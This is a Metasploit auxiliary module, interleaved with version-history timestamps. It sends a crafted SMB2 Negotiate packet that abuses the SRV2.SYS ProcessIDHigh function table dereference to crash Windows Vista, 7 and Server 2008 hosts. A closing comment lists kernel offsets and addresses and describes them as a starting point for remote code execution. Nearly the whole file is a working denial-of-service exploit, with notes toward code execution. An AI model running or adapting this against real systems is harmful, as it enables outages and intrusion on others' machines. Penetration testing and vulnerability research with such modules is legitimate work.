2009-09-08 17:41:40 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/framework/
|
|
|
|
##
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
include Msf::Auxiliary::Dos
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits an out of bounds function table dereference in the SMB
|
|
|
|
Negotiate request parsing code of the SRV2.SYS driver included with Windows Vista
|
|
|
|
, Windows 7, and Windows 2008 Server. It is likely that this flaw also affects
|
|
|
|
Windows 2003 SP1/SP2, but this has not been confirmed. Windows Vista without SP1
|
|
|
|
does not seem affected by this flaw (but is affected by vista_negotiate_stop).
|
|
|
|
},
|
|
|
|
|
|
|
|
'Author' => [ 'laurent.gaffie[at]gmail.com', 'hdm' ],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Version' => '$Revision$',
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['URL', 'http://seclists.org/fulldisclosure/2009/Sep/0039.html'],
|
|
|
|
]
|
|
|
|
))
|
|
|
|
register_options([
|
|
|
|
Opt::RPORT(445),
|
|
|
|
OptInt.new('OFFSET', [true, 'The function table offset to call', 0xffff])
|
|
|
|
], self.class)
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def run
|
|
|
|
connect()
|
|
|
|
|
|
|
|
# The SMB 2 dialect must be there
|
|
|
|
dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12', 'SMB 2.002']
|
|
|
|
data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('')
|
|
|
|
|
|
|
|
pkt = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct
|
|
|
|
pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE
|
|
|
|
pkt['Payload']['SMB'].v['Flags1'] = 0x18
|
|
|
|
pkt['Payload']['SMB'].v['Flags2'] = 0xc853
|
|
|
|
pkt['Payload'].v['Payload'] = data
|
|
|
|
|
|
|
|
pkt['Payload']['SMB'].v['ProcessIDHigh'] = datastore['OFFSET'].to_i
|
|
|
|
pkt['Payload']['SMB'].v['ProcessID'] = 0
|
|
|
|
pkt['Payload']['SMB'].v['MultiplexID'] = rand(0x10000)
|
|
|
|
|
2009-09-08 17:48:12 +00:00
|
|
|
print_status("Sending request and waiting for a reply...")
|
2009-09-08 17:41:40 +00:00
|
|
|
sock.put(pkt.to_s)
|
2009-09-08 17:48:12 +00:00
|
|
|
r = sock.get_once
|
|
|
|
|
|
|
|
if(not r)
|
|
|
|
print_status("The target system has likely crashed")
|
|
|
|
else
|
|
|
|
print_status("Response received: #{r.inspect}")
|
|
|
|
end
|
|
|
|
|
2009-09-08 17:41:40 +00:00
|
|
|
disconnect()
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
=begin
|
|
|
|
|
|
|
|
Gaining code execution means pointing the offset to something that
|
|
|
|
eventually causes us to run arbitrary code. The offsets below are
|
|
|
|
a starting point for turning this into remote code execution.
|
|
|
|
|
|
|
|
Offsets on Vista SP1 x64:
|
|
|
|
0x1B = "SMB 2.002"
|
|
|
|
0x1D = L"SMB2Validate"
|
|
|
|
0x1E = L"SMB2Execute"
|
|
|
|
0x31 = move eax, 0x00000002 + ret # causes a hang when reaced
|
|
|
|
0x58 = WmiQueryTraceInformation
|
|
|
|
0x59 = WmiTraceMessage
|
|
|
|
0x66 = ExAllocatePoolWithTag
|
|
|
|
0x67 = ExFreePool
|
|
|
|
0x76 = ExAllocatePoolWithTag
|
|
|
|
0x77 = ExFreePool
|
|
|
|
0x86 = ExAllocatePoolWithTag
|
|
|
|
0x87 = ExFreePoo
|
|
|
|
0x96 = ExAllocatePoolWithTag
|
|
|
|
0x97 = ExFreePoo
|
|
|
|
0xa6 = ExAllocatePoolWithTag
|
|
|
|
0xa7 = ExFreePoo
|
|
|
|
0xb9 = BugCheckEx
|
|
|
|
0xc7 = SrvBalanceCredits
|
|
|
|
0xdf = SrvNetStatistics data
|
|
|
|
0xe0 = SrvNetStatisticsLock
|
|
|
|
0x010e = SrvSnapShotScaevengerThread
|
|
|
|
0x011c = SrvSnapShotScavengerTimer
|
|
|
|
0x012a = SrvScavengerThread
|
|
|
|
0x0138 = SrvScavengerTimer
|
|
|
|
0x0146 = SrvScavengeDurableHandles
|
|
|
|
0x0157 = SrvScavengeDurableHandlesTimer
|
|
|
|
0x0166 = SrvProcessOplockBreaks
|
|
|
|
0x0179 = SrvProcessOplockBreakTimer
|
|
|
|
0x0185 = L"XactSrv"
|
|
|
|
0x01f8 = WppTraceCallback
|
|
|
|
|
|
|
|
|
|
|
|
Offsets on Vista SP1 (no updates) x86:
|
|
|
|
|
|
|
|
0x64 = mov esp, ebp; pop ebp, ret
|
|
|
|
0xde = pool with tag
|
|
|
|
|
|
|
|
0 -> 99b51d6e - 8bff558bec5153568b75088b46308b98
|
|
|
|
1 -> 99b55967 - 8bff558bec51518b45088b48308b8958
|
|
|
|
2 -> 99b53e19 - 8bff558bec568b75088b4e7083791444
|
|
|
|
3 -> 99b55811 - 8bff558bec5151538b5d088b43708378
|
|
|
|
4 -> 99b53d54 - 8bff558bec56578b7d088b4770837814
|
|
|
|
5 -> 99b54d41 - 8bff558bec83ec145356578b7d088b47
|
|
|
|
6 -> 99b54c81 - 8bff558bec518b4d088b816c01000053
|
|
|
|
7 -> 99b66c44 - 8bff558bec518b4d088b816c01000053
|
|
|
|
8 -> 99b655bf - 8bff558bec518b55088b427083781471
|
|
|
|
9 -> 99b63ce4 - 8bff558bec518b4d088b816c01000053
|
|
|
|
10 -> 99b5a221 - 8bff558bec518b4d088b816c01000053
|
|
|
|
11 -> 99b62996 - 8bff558bec518b4d088b816c01000053
|
|
|
|
12 -> 99b5fab5 - 8bff558bec518b4d088b816c01000053
|
|
|
|
25 -> 819aca26 - 6a2468d0988981e8960beeff33d28955
|
|
|
|
26 -> 8186c78b - 8bff558bec83e4f86a008d451c50ff75
|
|
|
|
62 -> 80d40f20 - 0000000000eb45000000000000000000
|
|
|
|
116 -> 819273b7 - 8bff558bec83e4f883ec3c538b5d088b
|
|
|
|
117 -> 8192739f - 8bff558bec6a00ff7508e8df0a00005d
|
|
|
|
166 -> 819273b7 - 8bff558bec83e4f883ec3c538b5d088b
|
|
|
|
167 -> 8192739f - 8bff558bec6a00ff7508e8df0a00005d
|
|
|
|
194 -> 99b6b74c - 8bff558bec83ec0c0fb64d088b451c53
|
|
|
|
195 -> 99b683f0 - 943018c0c6fd3f49a3e8697224f83f6f
|
|
|
|
206 -> 99b5eeb5 - 8bff558bec83ec1ca11094b69953568b
|
|
|
|
217 -> 99b5eea0 - 6a0168809ab699ff151880b699c21000
|
|
|
|
226 -> 99b5211d - 8bff558bec83ec145356578d45f450c6
|
|
|
|
231 -> 8192fcd0 - 0000000014fd9281ffffffff04000000
|
|
|
|
237 -> 99b52108 - 6a0168009bb699ff151880b699c21000
|
|
|
|
382 -> 8b137500 - 000000009075138b0000000000000000
|
|
|
|
491 -> 8599b680 - 894518e82ee2ffff3b45087341ff7520
|
|
|
|
646 -> c000009a - 0000ffffffff80040000ffffffff8004
|
|
|
|
734 -> 802015ff - ffde03f078f8ff7f7c02f8ff3ffe01fe
|
|
|
|
760 -> 99b4ff28 - 8bff558bec6a00ff7514ff7510ff750c
|
|
|
|
804 -> 830ffc7d - 0000001722268b3e012004020010c01c
|
|
|
|
|
|
|
|
|
|
|
|
=end
|